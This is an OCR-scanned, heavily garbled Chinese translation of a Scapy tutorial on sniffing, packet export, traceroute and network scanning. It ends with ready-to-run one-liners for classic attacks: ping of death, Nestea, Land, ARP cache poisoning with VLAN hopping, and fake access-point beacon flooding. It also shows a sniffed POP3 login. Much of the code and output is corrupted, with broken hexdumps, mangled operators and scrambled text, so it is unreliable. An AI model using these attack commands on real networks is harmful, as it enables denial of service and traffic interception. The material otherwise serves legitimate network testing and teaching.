14:110 -> 192.168.8. 
free.fr» 


10:47226 -> 213.228. 
10:47226 -> 213.228. 


14:110 -> 192.168.8. 
14:110 -> 192.168.8. 


10:47226 -> 213.228. 
10:47226 -> 213.228. 


14:110 -> 192.168.8. 


10:47226 -> 213.228. 
14:110 -> 192.168.8. 
10:47226 -> 213.228. 
14:110 -> 192.168.8. 


在 循环 中 接收 和 发 送 


这 儿 有 一 个 例子 来 实现 类 似 (h)ping 的 功能 : 你 一 直 发 送 同 样 的 数据 包 集 合 来 观察 是 


否 发 生变 化 : 


port 25 or port 110 )", 
src%:%TCP.sport% -> %IP.dst%:%TCP. 
payload%'")) 

0.14:110 SE 

10:47226 SA : 

0.14:110 AS: 

10:47226 PA : +OK <13103.10481179 


0.14:110 üx t 
0.14:110 PA : USER toto 


10:47226 a t 
10:47226 PA : +OK 


0.14:110 Aw: 
0.14:110 PA : PASS tata 


10:47226 PA : -ERR authorization 


0.14:110 AME: 
10:47226 FA : 
0.14:110 FA: 
10:47226 A: 


>>> srloop(IP(dst-z"www.target.com/30")/TCP()) 


RECV 1: Ether / IP / 


Padding 
fail 3: 


Padding 
fail 3: 


Padding 
fail 3: 


Padding 
fail 3: 


导入 和 导出 数据 


PCAP 


IP / TCP 192. 
TP/OMTCP lO 
LE /TCP 4392: 
RECV 1: Ether / IP / 


IP / TCP 192. 
IP / TCP 192. 
IP / TCP 192. 
RECV 1: Ether / IP / 


IP / TCP 192. 
IP / TCP 192. 
TP MEP 192: 
RECV 1: Ether / IP / 


LIP CP 4:02 
IP / TCP 192. 
FB /TCP lI92. 


TCP 


168 
168 
168 
TCP 


168 
168 
168 
TCP 


168 
168 
168 
TCP 


168 
168 
168 


192.168. 


.8.14:20 
.8.14:20 
.8.14:20 


192.168. 


.8.14:20 
.8.14:20 
.8.14:20 


192.168. 


.8.14:20 
.8.14:20 
.8.14:20 


192.168. 


.8.14:20 
.8.14:20 
.8.14:20 


1499 


> 192 
> 1:92 


> 192. 
:80 > 192.168. 


1099 


> 192 
> 192 
> 192 
11.99 


> 192. 
.168.11.98:80 
.168.11.97:80 
:80 > 192.168. 


> 192 
> 192 
11799 


> 192 
> 192 
> 192 


:80 > 192.168. 


.168.11.96:80 
.168.11.98:80 


168.11.97:80 


.168.11.96:80 
.168.11.98:80 
.168.11.97:80 
:80 > 192.168. 


168.11.96:80 


.168.11.96:80 
.168.11.98:80 
.168.11.97:80 


WN 


.14:20 SA / 


.14:20 SA / 


.14:20 SA / 


.14:20 SA / 


通常 可 以 将 数据 包 保 存 为 pcap 文 件 以 备 后 用 ， 或 者 是 供 其 他 的 应 用 程序 使 用 : 


>>> wrpcap("temp.cap",pkts) 


还 原 之 前 保存 的 pcap 文 件 : 


>>> pkts = 


或 者 


>>> pkts 


Hexdump 


rdpcap("temp.cap") 


rdpcap("temp.cap") 


Scapy 允 许 你 以 不 同 的 十 六 进 制 格式 输出 编码 的 数据 包 。 
使 用 hexdump() 函数 会 以 经 典 的 hexdump 格 式 输出 数据 包 : 


>>> hexdump(pkt) 
0000 00 50 56 FC CE 50 00 OC 29 2B 53 19 08 00 45 00 .PV..P 


)S...E 
0010 00 54 00 00 40 00 40 O1 5A 7C CO A8 19 82 04 O2  .T..Q. 
doy ecce 
0020 02 01 08 00 9C 90 5A 61 00 01 E6 DA 70 49 B6 E5  ...... 
Za....pI 


0030 08 00 08 09 OA OB OC OD OE OF 10 11 12 13 14 15 —...... 


0040 16 17 18 19 1A 1B 1C 4D 1E 1F 202122232425  ...... 


.... 1"#$% 

0050 26 27 28 29 2A 2B 2C 2D 2E 2F 30 31 32 33 34 35 &'()*+ 
,-./012345 

0060 36 37 67 


使 用 import hexcap() 函数 可 以 将 以 上 的 hexdump 重 新 导入 到 Scapy 中 : 


>>> pkt hex = Ether(import hexcap()) 
0000 00 50 56 FC CE 50 00 OC 29 2B 53 19 08 00 45 00 .PV..P 


..)+S...E. 

0010 00 54 00 00 40 00 40 O1 5A 7C CO A8 19 82 04 O2  .T..Q. 
zum wae 

0020 02 01 08 00 9C 90 5A 61 00 01 E6 DA 70 49 B6 E5  ...... 
Za....pI 


0030 08 00 08 09 OA OB OC OD OE OF 10 11 12 13 14 15  ...... 


0040 16 17 18 19 1A 1B 1C 1D 1E 1F 202122232425  |...... 


zia !"#$% 

0050 26 27 28 29 2A 2B 2C 2D 2E 2F 30 31 32 33 34 35 &'()*+ 
, - ./012345 

0060 36 37 67 

>>> pkt_hex 


«Ether dst=00:50:56:fc:ce:50 Src=00:0c:29:2b:53:19 type=0x800 | 
«IP version-4L 

ihl=5L tos=0x0 len=84 id=0 flags-DF frag-OL ttl-64 proto=icmp ch 
ksum=0x5a7c 

Src-192.168.25.130 dst=4.2.2.1 options='' |«ICMP type=echo-requ 
est code=0 

chksum=0x9c90 id=0x5a61 seq-0x1 |<Raw load='\xe6\xdapI\xb6\xe5\ 
X08Nx00Nx08Nt^n 

NXObNxXOCNENXOeNxXOf NX10NX11NX12NX13NX14NX15NX16NX17NX18NX19Nx1aNXx 
Ab\xic\x1d\x1ie 

NXAf !"#$%&\'()*+,-./01234567' |>>>> 


Hex string 


使 用 str() Bal VAG ES RAE LH em F >< gt 9] 3 4 : 


>>> pkts = sniff(count = 1) 

>>> pkt = pkts[0] 

>>> pkt 

«Ether dst=00:50:56:fc:ce:50 src=00:0c:29:2b:53:19 type-0x800 | 
«IP version-4L 

ihl=5L tos=0x0 len=84 id=0 flags-DF frag-OL ttl-64 proto=icmp ch 
ksum=0x5a7c 

src=192.168.25.130 dst=4.2.2.1 options='' |<ICMP type=echo-requ 
est code=0 

chksum=0x9c90 id=0x5a61 seq-0x1 |«Raw load='\xe6\xdapI\xb6\xe5\ 
X08Nx00Nx08Nt^n 

NXObNxXOCNENXOeNXOf NX10NX11NX12NX13NX14NX15NX16NX17NX18NX19Nx1aNXx 
1bNxicNxidNxie 

NXAf !"#$%&\'()*+,-./01234567' |>>>> 

>>> pkt_str = str(pkt) 

>>> pkt_str 

"\xOOPV\xfc\xceP\xOO\x0C )+S\x19\xX08\xXO0E\xX00\xO00T\xXO00\x00@\x00@\ 
X01Z | \xcO\xa8 
NX19NX82NX04NX02NX02NX01NX08NX00NX9CNX90ZaNx00Nx01Nxe6NxdapINxb6 
\xe5\x08\x00 

NX608NtNnNXxObNxOCNENXOeNXOf NX10NX11NX12NX13NX14NX15NX16NX17NX18NX 
19Nx1aNx1b 

\x1c\x1d\x1e\x1f | "#$%&\'()*+, -./01234567' 


通过 选择 合适 的 起 始 层 (例如 Ether() ) ， 我 们 可 以 重新 导入 十 六 进 制 字符 串 。 


>>> new pkt = Ether(pkt str) 

>>> new pkt 

«Ether dst=00:50:56:fc:ce:50 src=00:0c:29:2b:53:19 type-0x800 | 
«IP version-4L 

ihl=5L tos=0x0 len=84 id=0 flags-DF frag-OL ttl-64 proto=icmp ch 
ksum=0x5a7c 

src=192.168.25.130 dst-4.2.2.1 options='' |«ICMP type=echo-requ 
est code=0 

chksum=0x9c90 id=0x5a61 seq-0x1 |«Raw load='\xe6\xdapI\xb6\xe5\ 
X08Nx00Nx08Nt^n 

NXObNxXOCNENxXOeNxXOf NX10NX11NX12NX13NX14NX15NX16NX17NX18NX19Nx1aNXx 
1bNxicNxidNxie 

NXAf !"#$%&\'()*+,-./01234567' |>>>> 


Base64 


使 用 export object() 函数 ，Scapy 可 以 数据 包 转 换 成 base64 编 码 的 Python 数据 
结构 : 


>>> pkt 

«Ether dst=00:50:56:fc:ce:50 src=00:0c:29:2b:53:19 type-0x800 | 
«IP version-4L 

ihl=5L tos=0x0 len=84 id=0 flags-DF frag-OL ttl-64 proto=icmp ch 
ksum=0x5a7c 

Src-192.168.25.130 dst-4.2.2.1 options='' |<ICMP type=echo-requ 
est code=0 

chksum=0x9c90 id=0x5a61 seq-0x1 |<Raw load='\xe6\xdapI\xb6\xe5\ 
X08Nx00Nx08Nt^n 

NXObNxOcNrENxOeNXxOf NX10NXx11NX12NX13NX14NX15NX16NX17NX18NX19NX1a NX 
1bNx1cNxidNxieNxif 

1"Z$96$&N'()*-,-./01234567' |>>>> 

>>> export object(pkt) 
eNplVwd4FNcCRPt2dTqdTQOJUUYwN+CgSOgkJONFESSWxFDB+Cdil8+pupV10d7uz 
RUiYtcEGGAST 

OD10nBenN6c4cXr vwQmk2U5xA9tgO70XMm-1rA78qdzbf TP/1Dfzz7tD4AWwmU1CO 
YiaT26gjaiao 
bMlhCrsUSYrYoKbmcxZFXSpPiohlzikm6ltb063ZdGpNOjWQ7mhPt62hChHJWTbF 
vb00/u1MD2bT 
WZXXVCmi9pihUqI3FHdEQslriiVfWFTVT9VYpog6Q7 f sj GOqRWtQNwsWi1fRTrUg4 
XZxq5pUx1as6 


使 用 import object() 函数 ， 可 以 将 以 上 输出 重新 导入 到 Scapy 中 : 


>>> new pkt = import object() 

eNplVwdA4FNCRPt2dTqdTQO JUUYwN+CgSOgkJONFESSWxFDB+Cdil8+pupV10d7uz 
RUiYtcEGGAST 

OD10nB6enN6c4cXr vwQmk2U5xA9tgO70XMm-1rA78qdzbf TP/1Dfzz7tD4AWwmU1CO 
YiaT2Gqjaiao 
bMlhCrsUSYrYoKbmcxZFXSpPiohlzikm6ltb063ZdGpNOjWQ7mhPt62hChHJWTbF 
vb00/u1MD2bT 
WZXXVCmi9pihUqI3FHdEQslriiVfWFTVT9VYpog6Q7 fs jGOqRWtQNwsWi1fRTrUg4 
XZxq5pUx1as6 


>>> new pkt 

«Ether dst=00:50:56:fc:ce:50 src=00:0c:29:2b:53:19 type-0x800 | 
«IP version-4L 

ihl=5L tos=0x0 len=84 id=0 flags-DF frag-OL ttl-64 proto=icmp ch 
ksum=0x5a7c 

src=192.168.25.130 dst-4.2.2.1 options='' |«ICMP type=echo-requ 
est code=0 

chksum=0x9c90 id=0x5a61 seq-0x1 |«Raw load='\xe6\xdapI\xb6\xe5\ 
X08Nx00Nx08Nt^n 

NXObNxXOCNENXOeNxXOf NX10NX11NX12NX13NX14NX15NX16NX17NX18NX19Nx1aNXx 
Ab\xic\x1id\x1ie\x1f 

I"#$%&\'()*+,-./01234567!' |>>>> 


Sessions 


最 后 可 以 使 用 save session() 函数 来 保存 所 有 的 Session 变量 : 


>>> dir() 

[' builtins ', 'conf', 'new pkt', 'pkt', 'pkt export', 'pkt he 
X oktaSt v kts 

>>> save session("session.scapy") 


使 用 load session() 函数 ， 在 下 一 次 你 启动 Scapy 的 时 候 你 就 能 加 载 保 存 的 
session : 


>>> dir() 

un sal EDIDI] 

>>> load session("session.scapy") 

>>> dir() 

[' builtins ', 'conf', 'new pkt', 'pkt', 'pkt export', 'pkt he 
Xa PKCS S C DEEST] 


Making tables 


现在 我 们 来 演示 一 下 make_table() 函数 的 功能 。 该 函数 的 需要 一 个 列表 和 另 一 
个 函数 (返回 包含 三 个 元 素 的 元 组 ) 作为 参数 。 第 一 个 元 素 是 表格 x 轴 上 的 一 个 
值 ， 第 二 个 元 素 是 y 轴 上 的 值 ， 第 三 个 原始 则 是 坐标 (X,y) 对 应 的 值 ， 其 返回 结果 为 
一 个 表格 。 这 个 函数 有 两 个 变 

种 ，make_lined table() 和 make tex table() 来 复制 /粘贴 到 你 的 LaTeX 报 告 
中 。 这 些 函 数 都 可 以 作为 一 个 结果 对 象 的 方法 : 


在 这 里 ， 我 们 可 以 看 到 一 个 多 机 并 行 的 traceroute (Scapy 的 已 经 有 一 个 多 TCP 路 由 
跟踪 功能 ， 待 会 儿 可 以 看 到 ) : 


>>> ans,unans=sr(IP(dst="www.test.fr/30", ttl=(1,6))/TCP()) 
Received 49 packets, got 24 answers, remaining © packets 

>>> ans.make table( lambda (s,r): (s.dst, s.ttl, r.src) ) 
216.15.189.192 216.15.189.193 216.15.189.194 216.15.189.195 
192.168.8.1 192.168.8.1 192.168.8.1 192.168.8.1 
81.57.239.254 81.57.239.254 81.57.239.254 81.57.239.254 
213.228.4.254 213.228.4.254 213.228.4.254 213.228.4.254 
213.228.3.3 213.228.3.3 213.228.3.3 213.228.3.3 
193.251.254.1 193.251.251.69 193.251.254.1 193.251.251.69 
193.251.241.174 193.251.241.178 193.251.241.174 193.251.241.17 


O O) O1 + Q N PF. 


这 里 有 个 更 复杂 的 例子 : 从 他 们 的 IPID 字 段 中 识别 主机 。 我 们 可 以 看 到 
172.20.80.200 只 有 22 端 口 做 出 了 应 答 ， 而 172.20.80.201 则 对 所 有 的 端口 都 有 应 
答 ， 而 且 172.20.80.197 对 25 端 口 没 有 应 答 ， 但 对 其 他 端口 都 有 应 答 。 


>>> ans,unans-sr(IP(dstz"172.20.80.192/28")/TCP(dport-[20, 21, 22, 
25,53,80])) 

Received 142 packets, got 25 answers, remaining 71 packets 

>>> ans.make table(lambda (s,r): (s.dst, s.dport, r.sprintf("%IP 


.id%"))) 
172.20.80.196 172.20.80.197 172.20.80.198 172.20.80.200 172.2 
0.80.201 
20 0 4203 7021 : 11562 
21 0 4204 7022 : 11563 
22 0 4205 7023 11561 11564 
25 0 0 7024 s 11565 
53 0 4207 7025 : 11566 
80 0 4028 7026 : 11567 


你 在 使 用 TTL 和 显示 接收 到 的 TTL 等 情况 下 ， 它 可 以 很 轻松 地 帮 你 识别 网 络 拓扑 结 
构 。 


Routing 
现在 Scapy 有 自己 的 路 由 表 了 ， 所 以 将 你 的 数据 包 以 不 同 于 操作 系统 的 方式 路 由 : 


>>> conf.route 


Network Netmask Gateway Iface 
127.0.0.0 255.0.0.0 0.0.0.0 lo 

192.168.8.0 255.255.255.0 0.0.0.0 ethO 
0.0.0.0 0.0.0.0 192.168.8.1 ethO 


>>> conf.route.delt(net="0.0.0.0/0", gw="192.168.8.1") 
>>> conf.route.add(net="0.0.0.0/0", gw="192.168.8.254") 
>>> conf.route.add(host="192.168.1.1", gw="192.168.8.1") 
>>> conf.route 


Network Netmask Gateway Iface 
127.0.0.0 255.0.0.0 0.0.0.0 lo 

192.168.8.0 255.255.255.0 0.0.0.0 ethO 
0.0.0.0 0.0.0.0 192.168.8.254 ethO 
192.168.1.1 255.255.255.255 192.168.8.1 ethO 


>>> conf.route.resync() 
>>> conf.route 


Network Netmask Gateway Iface 
127.0.0.0 255.0.0.0 0.0.0.0 lo 

192.168.8.0 255.255,.255.0 0.0.0.0 etho 
0.0.0.0 0.0.0.0 192.168.8.1 etho 


Gnuplot 


我 们 可 以 很 容易 地 将 收集 起 来 的 数据 绘制 成 Gnuplot。 ( 清 确保 你 已 经 安装 
Gnuplot-pyfeGnuplot) 例如 ， 我 们 可 以 通过 观察 图 案 知 道 负载 平衡 器 用 了 
同 的 IP 堆栈 : 


NN eq 
` 
> 
> 


>>> a,b=sr(IP(dst="www.target.com")/TCP(sport=[RandShort()]*1000 


)) 
>>> a.plot(lambda x:x[1].id) 
<Gnuplot._Gnuplot.Gnuplot instance at 0xb7d6a74c» 
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TCP traceroute (2) 


Scapy 也 有 强大 的 TCP traceroute 功 能 。 并 不 像 其 他 traceroute 程 序 那样 ， 需 要 等 待 
每 个 节点 的 回应 才 去 下 一 个 节点 ，Scapy 会 在 同一 时 间 发 送 所 有 的 数据 包 。 其 缺点 

就 是 不 知道 什么 时 候 停止 〈 所 以 就 有 maxttl 参 数 ) ， 其 巨大 的 优点 就 是 ， 只 用 了 不 

到 3 秒 ， 就 可 以 得 到 多 目标 的 traceroute 结 果 : 


>>> traceroute(["www. yahoo.com", "www.altavista.com","www.wisenut 

. com", "www.copernic.com"],maxttl-20) 

Received 80 packets, got 80 answers, remaining © packets 
193.45.10.88:80 216.109.118.79:80 64.241.242.243:80 66.9 

4.229.254:80 


1 192.168.8.1 192.168.8.1 192.168.8.1 192. 
168.8.1 

2 82.243.5.254 82.243.5.254 82.243.5.254 82.2 
43.5.254 

3 213.228.4.254 213.228.4.254 213.228.4.254 213. 
228.4.254 

4 212.27.50.46 212.27.50.46 212.27.50.46 212. 
27.50.46 

5 212.27.50.37 212.27.50.41 212.27.50.37 212. 
27.50.41 

6 212.27.50.34 212.27.50.34 213.228.3.234 193. 
251.251.69 

7 213.248.71.141 217.118.239.149 208.184.231.214 193. 
251.241.178 

8 213.248.65.81 217.118.224. 44 64.125.31.129 193. 
251.242.98 

9 213.248.70.14 213.206.129. 85 64.125.31.186 193. 
251.243.89 

10 193.45.10.88 SA 213.206.128.160 64.125.29.122 193: 
251.254.126 

11 193.45.10.88 SA 206.24.169.41 64.125.28.70 216. 
115.97.178 

12 193.45.10.88 SA 206.24.226.99 64.125.28.209 66.2 
18.64.146 

13 193.45.10.88 SA 206.24.227.106 64.125.29.45 66.2 
18.82.230 

14 193.45.10.88 SA 216.109.74.30 64.125.31.214 66.9 
4.229.254 SA 

15 193.45.10.88 SA 216.109.120.149 64.124.229.109 66.9 


4.229.254 SA 

16 193.45.10.88 SA 216.109.118.79 SA 64.241.242.243 SA 66.9 
4.229.254 SA 

17 193.45.10.88 SA 216.109.118.79 SA 64.241.242.243 SA 66.9 
4.229.254 SA 

18 193.45.10.88 SA 216.109.118.79 SA 64.241.242.243 SA 66.9 
4.229.254 SA 

19 193.45.10.88 SA 216.109.118.79 SA 64.241.242.243 SA 66.9 
4.229.254 SA 

20 193.45.10.88 SA 216.109.118.79 SA 64.241.242.243 SA 66.9 
4.229.254 SA 

(«Traceroute: UDP:0 TCP:28 ICMP:52 Other:0>, «Unanswered: UDP:0 
TCP:0 ICMP:0 Other:0>) 


最 后 一 行 实际 上 是 该 函数 的 返回 结果 : traceroute 返 回 一 个 对 象 和 无 应 答 数 据 包 列 
表 。traceroute 返 回 的 是 一 个 经 典 返回 对 象 更 加 特殊 的 版 本 (实际 上 是 一 个 子 
X) 。 我 们 可 以 将 其 保存 以 备 后 用 ， 或 者 是 进行 一 些 例如 检查 填充 的 更 深层 次 的 观 


3» 


>>> result, unans=_ 
>>> result.show() 


193.45.10.88:80 


4.229.254:80 


1 


192.168.8.1 


168.8.1 


2 


5an 


3 


82.251.4.254 
4.254 
213.228.4.254 


228.4.254 


ms 


22 


和 其 他 返回 对 象 一 样 ，traceroute 对 象 也 可 以 相 加 : 


.] 


216.109.118.79:80 


192.168.8.1 


82.251.4.254 


213.228.4.254 


64.241.242.243:80 


192.168.8.1 


82.251.4.254 


213.228.4.254 


result.filter(lambda x: Padding in x[1]) 


>>> r2,unans=traceroute(["www.voila.com"],maxttl=20) 


Received 19 packets, got 19 answers, 


«o OO +I O) OI — G N P. 


>>> 


195.101.94.25:80 
192.168.8.1 
82.251.4.254 
213.228.4.254 
212.27.50.169 
212.27.50.162 
193.252.161.97 
193.252.103.86 
193.252.103.77 
193.252.101.1 
193.252.227.245 


19571017947125 SA 
195.101.94.25 SA 
195.101.94.25 SA 
195.101.94.25 SA 
195.101.94.25 SA 
195.101.94.25 SA 
1957101794125 SA 
195.101.94.25 SA 
195.101.94.25 SA 


>>> r3=result+r2 
>>> r3.show() 


195.101.94.25:80 


212.23.37.13:80 


41.242.243:80 66.94.229.254:80 


1 192.168.8.1 192.168.8.1 
168.8.1 192.168.8.1 

2 82.251.4.254 82.251.4.254 
51.4.254 82.251.4.254 

3 213.228.4.254 213.228.4.254 
228.4.254 213.228.4.254 

4 212.27.50.169 212.27.50.169 


remaining 1 packets 


216.109.118.72:80 


192.168.8.1 


82.251.4.254 


213.228.4.254 


212.27.50.46 


213. 


213. 


212.27.50.46 


5 212.27.50.162 212.27.50.162 212.27.50.37 212. 
27.50.41 212.27.50.37 

6 193.252.161.97 194.68.129.168 212.27.50.34 213. 
228.3.234 193.251.251.69 

7 193.252.103.86 212.23.42.33 217.118.239.185 208. 
184.231.214 193.251.241.178 

8 193.252.103.77 212.23.42.6 217.118.224.44 64.1 
25.31.129 193.251.242.98 

9 193.252.101.1 212.23.37.13 SA 213.206.129.85 64.1 
25.31.186 193.251.243.89 

10 193.252.227.245 212.23.37.13 SA 213.206.128.160 64.1 
25.29.122 193.251.254.126 

dlab ce 212.23.37.13 SA 206.24.169.41 64.1 
25.28.70 216.115.97.178 

12 195.101.94.25 SA 212.23.37.13 SA 206.24.226.100 64.1 
25.28.209 216.115.101. 46 

13 195.101.94.25 SA 212.23.37.13 SA 206.24.238.166 64.1 
25.29.45 66.218.82.234 

14 195.101.94.25 SA 212.23.37.13 SA 216.109.74.30 64.1 
25.31.214 66.94.229.254 SA 

15 195.101.94.25 SA 212.23.37.13 SA 216.109.120.151 64.1 
24.229.109 66.94.229.254 SA 


16 195.101.94.25 SA 212.23.37.13 SA 216.109.118.72 SA 64.2 
41.242.243 SA 66.94.229.254 SA 
17 195.101.94.25 SA 212.23.37.13 SA 216.109.118.72 SA 64.2 
41.242.243 SA 66.94.229.254 SA 
18 195.101.94.25 SA 212.23.37.13 SA 216.109.118.72 SA 64.2 
41.242.243 SA 66.94.229.254 SA 
19 195.101.94.25 SA 212.23.37.13 SA 216.109.118.72 SA 64.2 
41.242.243 SA 66.94.229.254 SA 
20 195.101.94.25 SA 212.23.37.13 SA 216.109.118.72 SA 64.2 
41.242.243 SA 66.94.229.254 SA 


Traceroute 返 回 对 象 有 一 个 非常 实用 的 功能 : 他 们 会 将 得 到 的 所 有 路 线 做 成 一 个 有 
向 图 ， 并 用 AS 组 织 路 线 。 你 需要 安装 graphviz。 在 默认 情况 下 会 使 用 ImageMagick 
显示 图 形 。 


>>> res,unans = traceroute(["www.microsoft.com", "www.cisco.com", 

"www.yahoo.com", "www.wanadoo. fr", "www.pacsec.com"], dport=[80, 443 

],maxtt1-20,retry--2) 

Received 190 packets, got 190 answers, remaining 10 packets 
193.252.122.103:443 193.252.122.103:80 198.133.219.25:443 198 

.133.219.25:80 207.46... 


1 192.168.8.1 192.168.8.1 192.168.8.1 192 
.168.8.1 292510607 

2 82.251.4.254 82.251.4.254 82.251.4.254 82. 
251.4.254 8275254] 

3 213.228.4.254 213.228.4.254 213.228.4.254 213 
.228.4.254 2-322 mn 

[...] 

>>> res.graph() # piped to ImageMagick' 


s display program. Image below. 

>>> res.graph(type="ps",target="| lp") # piped to postscript p 
rinter 

>>> res.graph(target="> /tmp/graph.svg") # saved to file 
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如 果 你 安装 了 VPython， 你 就 可 以 用 3D 来 表示 traceroute。 右 边 的 按钮 是 旋转 图 

案 ， 中 间 的 按钮 是 放大 缩小 ， 左 边 的 按钮 是 移动 图 案 。 如 果 你 单 击 一 个 球 ， 它 的 IP 
地 址 就 会 出 现 / 消 失 。 如 果 你 按 住 Ctrl 单 击 一 个 球 ， 就 会 扫描 21,22,23,25,80 和 443 端 
口 ， 并 显示 结果 : 


>>> res.trace3D() 


49 








Wireless frame injection 


frame injection 的 前 提 是 你 的 无 线 网 卡 和 驱动 得 正确 配置 好 。 


$ ifconfig wlanO up 
$ iwpriv wlanO hostapd 1 
$ ifconfig wlanOap up 


你 可 以 造 一 个 FakeAP : 


>>> sendp(Dotii1(addri-"ff:ff:ff:ff:ff:ff",addr2-RandMAC(), addr3- 
RandMAC( ) )/ 
DotiiBeacon(cap="ESS")/ 
Dot11Elt(ID-"SSID",info-RandString(RandNum(1,50)))/ 
Doti1E1t(ID="Rates", info='\x82\x84\xOb\x16' )/ 
Doti1E1t(ID="DSset", info="\x03")/ 
Doti1E1t(ID="TIM", info="\x00\x01\x00\x00"), iface="Wlan 
Oap", loop=1) 


0x02 Simple one-liners 


ACK Scan 


使 用 Scapy 强 大 的 数据 包 功能 ， 我 们 可 以 快速 地 复制 经 典 的 TCP 扫 描 。 例 如 ， 模 拟 
ACK Scan 将 会 发 送 以 下 字符 串 : 


>>> ans,unans = sr(IP(dst="www.slashdot.org")/TCP(dport=[80, 666 ] 
,flags="A")) 


我 们 可 以 在 有 应 答 的 数据 包 中 发 现 未 过 滤 的 端口 : 


>>> for s,r in ans: 
if s[TCP].dport -- r[TCP].sport: 
print str(s[TCP].dport) * " is unfiltered" 


同样 的 ， 可 以 在 无 应 答 的 数据 包 中 发 现 过 滤 的 端口 : 


>>> for s in unans: 
print str(s[TCP].dport) + " is filtered" 


Xmas Scan 
可 以 使 用 以 下 的 命令 来 启动 Xmas Scan : 


>>> ans,unans = sr(IP(dst="192.168.1.1")/TCP(dport=666, flags="FP 
U") ) 


有 RST 响 应 则 意味 着 目标 主机 的 对 应 端口 是 关闭 的 。 


IP Scan 
较 低 级 的 IP Scan 可 以 用 来 枚 举 支 持 的 协议 : 


>>> ans,unans-sr(IP(dstz"192.168.1.1",protoz(0,255))/"SCAPY",ret 
ry=2) 


ARP Ping 
在 本 地 以 太 网 络 上 最 快速 地 发 现 主机 的 方法 英 过 于 ARP Ping f : 


>>> ans,unans-srp(Ether(dstz"ff:ff:ff:ff:ff:ff'")/ARP(pdst-z"192.1 
68.1.0/24"), timeout=2) 


用 以 下 命令 可 以 来 审查 应 答 : 


>>> ans.summary(lambda (s,r): r.sprintf("%Ether.src% %ARP.psrc%" 


) ) 
Scapy 还 包含 内 建 函 数 arping() ,该 函数 实现 的 功能 和 以 上 的 两 个 命令 类 似 : 


>>> arping("192.168.1.*") 


ICMP Ping 
可 以 用 以 下 的 命令 来 模拟 经 典 的 ICMP Ping : 

>>> ans,unans=sr(IP(dst="192.168.1.1-254")/ICMP()) 
用 以 下 的 命令 可 以 收集 存活 主机 的 信息 : 


>>> ans.summary(lambda (s,r): r.sprintf("%IP.src% is alive") ) 


TCP Ping 


如 果 ICMP echo 请 求 被 禁止 了 ， 我 们 依 昌 可 以 用 不 同 的 TCP Pings > 3C4 T way 
TCP SYN Ping: 


>>> ans,unans-sr( IP(dst="192.168.1.*")/TCP(dport=80, flags="S") 
) 


对 我 们 的 刺探 有 任何 响应 就 意味 着 为 一 台 存 活 主机 ， 可 以 用 以 下 的 命令 收集 结果 : 


>>> ans.summary( lambda(s,r) : r.sprintf("%IP.src% is alive") ) 


UDP Ping 


如 果 其 他 的 都 失败 了 ， 还 可 以 使 用 UDP Ping ， 它 可 以 让 存活 主机 产生 ICMP Port 
unreachable 错 误 。 你 可 以 挑选 任何 极 有 可 能 关闭 的 端口 ， 就 像 端 口 0 : 


>>> ans,unans-sr( IP(dst="192.168.*.1-10")/UDP(dport=0) ) 
同样 的 ， 使 用 以 下 命令 收集 结果 : 


>>> ans.summary( lambda(s,r) : r.sprintf("%IP.src% is alive") ) 


Classical attacks 


Malformed packets: 


>>> send(IP(dstz"10.1.1.5", ihl-2, version-3)/ICMP()) 


Ping of death (Muuahahah): 


>>> send( fragment(IP(dst-z"10.0.0.5")/ICMP()/("X"*60000)) ) 


Nestea attack: 


>>> send(IP(dst-target, id-42, flags="MF")/UDP()/("X"*10) ) 
>>> send(IP(dst=target, id=42, frag=48)/("X"*116) ) 
>>> send(IP(dst-target, id-42, flags="MF")/UDP()/("X"*224) ) 


Land attack (designed for Microsoft Windows): 


>>> send(IP(src-target,dst-target)/TCP(sport-135, dport-135)) 


ARP cache poisoning 


3% dp ET VAR 3E VLANSIESK XX d RARPE £o 4&4 ELE PRK bu 2 BEY 
网 关 地 址 。 


经 典 的 ARP 缓 存 投 毒 : 


>>> send( Ether(dst=clientMAC)/ARP(op="who-has", psrc-gateway, p 
dst=client), 
inter-RandNum(10,40), loop-1 ) 


4% Fl double 802.1031 X 3t 4£TARP HAH : 


>>> send( Ether(dst-clientMAC)/DotiQ(vlan-1)/DotiQ(vlan-2) 
/ARP(opz"who-has", psrc-gateway, pdst=client), 
inter-RandNum(10,40), loop-1 ) 


TCP Port Scanning 


发 送 一 个 TCP SYN 到 每 一 个 端口 上 。 等 待 一 个 SYN-ACK 或 者 是 RST 或 者 是 一 个 
ICMP 错 误 : 


>>> res,unans = sr( IP(dst="target") 
/TCP(flags="S", dport=(1,1024)) ) 


将 开放 的 端口 结果 可 视 化 : 


>>> res.nsummary( lfilter-lambda (s,r): (r.haslayer(TCP) and (r. 
getlayer(TCP).flags & 2)) ) 


IKE Scanning 


我 们 试图 通过 发 送 ISAKMP Security Association proposals # #4 £ VPN # v Š > # 
接收 应 答 : 


>>> res,unans = sr( IP(dst-z"192.168.1.*")/UDP() 
/ISAKMP(init cookie-RandString(8), exch_type="id 
entity prot.") 


)) 


/ISAKMP payload SA(prop-ISAKMP payload Proposal( 


可 视 化 结果 列表 : 


>>> res.nsummary(prn-lambda (s,r): r.src, lfilter-lambda (s,r): 
r.haslayer(ISAKMP) ) 


Advanced traceroute 
TCP SYN traceroute 


>>> ans,unans-sr(IP(dstz"4.2.2.1",tt1-(1,10))/TCP(dport-53, flags 


>>> ans.summary( lambda(s,r) : r.sprintf("%IP.src%\t{ICMP:%ICMP. 
type%}\t {TCP :%TCP.flags%}") ) 


192.168.1.1 time -exceeded 
68.86.90.162 time -exceeded 
4.79.43.134 time -exceeded 
4.79.43.133 time -exceeded 
4.68.18.126 time-exceeded 
4.68.123.38 time-exceeded 
425211 SA 


UDP traceroute 
相 比 较 TCP 来 说 ，traceroute 一 个 UDP 应 用 程序 是 不 可 人 靠 的 ， 因 为 ta 没有 握手 的 过 
程 。 我 们 需要 给 一 个 应 用 性 的 有 效 载 荷 (DNS ° ISAKMP ，NTP 等 ) 来 得 到 一 个 应 


< : 


>>> res,unans = sr(IP(dst="target", ttl-(1,20))/UDP()/DNS(qd-DNS 
QR(qname="test.com") ) 


我 们 可 以 想象 得 到 一 个 路 由 器 列表 的 结果 : 


>>> res.make table(lambda (s,r): (s.dst, s.ttl, r.src)) 


DNS traceroute 


我 们 可 以 在 traceroute() BAPRA 14 参数 为 一 个 完整 的 数据 包 ， 来 实现 
DNS traceroute : 


>>> ans, unans=traceroute("4.2.2.1",14=UDP(sport=RandShort())/DNS 
(qd=DNSQR(qname="thesprawl.org"))) 
Begin emission: 

So tate M Nee qms aS NOOO o Shui sO packers. 


KKKKK 大 类 类 


Received 75 packets, got 28 answers, remaining 2 packets 
4.2.2.1:udp53 


